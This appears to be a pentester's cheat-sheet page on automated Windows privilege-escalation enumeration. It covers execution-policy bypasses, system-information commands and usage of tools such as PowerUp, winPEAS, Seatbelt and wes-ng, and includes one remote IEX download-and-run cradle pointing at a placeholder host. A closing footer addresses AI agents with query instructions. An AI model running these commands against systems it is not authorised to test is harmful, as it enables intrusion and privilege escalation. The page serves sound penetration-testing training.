# enumeration auto ## Path fix ```powershell set PATH=C:\Windows;C:\Windows\system32;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\;%PATH% Get-ExecutionPolicy -List Set-ExecutionPolicy Unrestricted ``` ## Check Arch, Process, Release ID [get OS info from version](https://docs.microsoft.com/en-us/windows/win32/api/winnt/ns-winnt-osversioninfoexa?redirectedfrom=MSDN#remarks) ```powershell PS> [system.environment]::Is64BitOperatingSystem PS> [system.environment]::Is64BitProcess > echo %PROCESSOR_ARCHITECTURE% PS > Get-ComputerInfo | select WindowsProductName, WindowsVersion, OsHardwareAbstractionLayer PS> (Get-ItemProperty -Path "HKLM:\SOFTWARE\Microsoft\Windows NT\CurrentVersion" -Name ReleaseId).ReleaseId PS> (Get-WmiObject -class Win32_OperatingSystem).Caption PS> [System.Environment]::OSVersion.Version ``` ## [PowerUp.ps1](https://github.com/PowerShellEmpire/PowerTools/blob/master/PowerUp/PowerUp.ps1) | [Sherlock.ps1](https://github.com/rasta-mouse/Sherlock/blob/master/Sherlock.ps1) | [JAWS.ps1](https://github.com/411Hall/JAWS/blob/master/jaws-enum.ps1) | [enjoiz-privesc.ps1](https://github.com/enjoiz/Privesc/blob/master/privesc.ps1) {% tabs %} {% tab title="PowerUp.ps1" %} ```powershell # located at /usr/share/windows-resources/powersploit/Privesc/PowerUp.ps1 > powershell.exe -exec bypass -Command "& {Import-Module .\PowerUp.ps1; Invoke-AllChecks -Format List}" [OR] PS> . .\PowerUp.ps1 PS> Invoke-AllChecks -Format List ``` {% endtab %} {% tab title="Sherlock.ps1" %} ```powershell > powershell.exe -exec bypass -Command "& {Import-Module .\Sherlock.ps1; Find-AllVulns}" [OR] PS> . .\Sherlock.ps1 PS> Find-AllVulns ``` {% endtab %} {% tab title="JAWS.ps1" %} ```powershell # located at /opt/JAWS/jaws-enum.ps1 > powershell -exec bypass IEX(New-Object Net.WebClient).downloadString('http://IP/jaws.ps1') ``` {% endtab %} {% tab title="enjoiz-privesc.ps1" %} ```powershell # located at /opt/Privesc/privesc.ps1 > powershell.exe -exec bypass -Command "& {Import-Module .\p.ps1; Invoke-Privesc -Groups 'Users,Everyone,Authenticated Users' -Whoami -Extended -Long}" ``` {% endtab %} {% endtabs %} ## [winPEAS](https://github.com/carlospolop/PEASS-ng/tree/master/winPEAS) | [Seatbelt](https://github.com/GhostPack/Seatbelt) | [SharpUp](https://github.com/GhostPack/SharpUp) {% tabs %} {% tab title="winPEAS" %} ```powershell # need .NET 4.0 # cmd check > dir /b %windir%\Microsoft.NET\Framework\v* > reg query "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\NET Framework Setup\NDP" > reg query "HKLM\SOFTWARE\Microsoft\Net Framework Setup\NDP\v4" /s # check for .NET using PS PS> cmd.exe /c dir /b %windir%\Microsoft.NET\Framework\v* PS> Get-ChildItem 'HKLM:\SOFTWARE\Microsoft\NET Framework Setup\NDP' -Recurse | Get-ItemProperty -Name version -EA 0 | Where { $_.PSChildName -Match '^(?!S)\p{L}'} | Select PSChildName, version winPEASany.exe quiet [cmd fast] [flag] # systeminfo; userinfo; processinfo; # servicesinfo; applicationsinfo; networkinfo; # windowscreds; browserinfo; filesinfo; eventsinfo ``` {% endtab %} {% tab title="Seatbelt" %} ```powershell # located at /usr/share/windows-resources/Ghostpack-CompiledBinaries/ > .\Seatbelt.exe -group=[all | ] -outputfile="FULL-PATH" ``` {% endtab %} {% tab title="SharpUp" %} ```powershell # located at /usr/share/windows-resources/Ghostpack-CompiledBinaries/ > .\SharpUp.exe ``` {% endtab %} {% endtabs %} ## [windows-exploit-suggester](https://github.com/AonCyberLabs/Windows-Exploit-Suggester) | [wes-ng](https://github.com/bitsadmin/wesng) {% tabs %} {% tab title="windows-exploit-suggester" %} ```bash # needs python2 # copy . # FIX: python2 -m pip install 'xlrd==1.2.0' ./windows-exploit-s.py --update ./windows-exploit-s.py -d -i [--hotfixes <>] # if cannot get hotfixes using systeminfo wmic qfe list full ``` {% endtab %} {% tab title="wes-ng" %} ```bash python3 /opt/wesng/wes.py sys.txt --update python3 /opt/wesng/wes.py systeminfo.txt [--exploits-only] -o wes.csv # --impact | -i "Remote Code Execution" | "Elevation of Privilege" # --severity critical ``` {% endtab %} {% endtabs %} {% embed url="" %} --- # Agent Instructions: Querying This Documentation If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question. Perform an HTTP GET request on the current page URL with the `ask` query parameter: ``` GET https://kashz.gitbook.io/kashz-jewels/os-windows/windows-enumeration/enumeration-auto.md?ask= ``` The question should be specific, self-contained, and written in natural language. The response will contain a direct answer to the question and relevant excerpts and sources from the documentation. Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.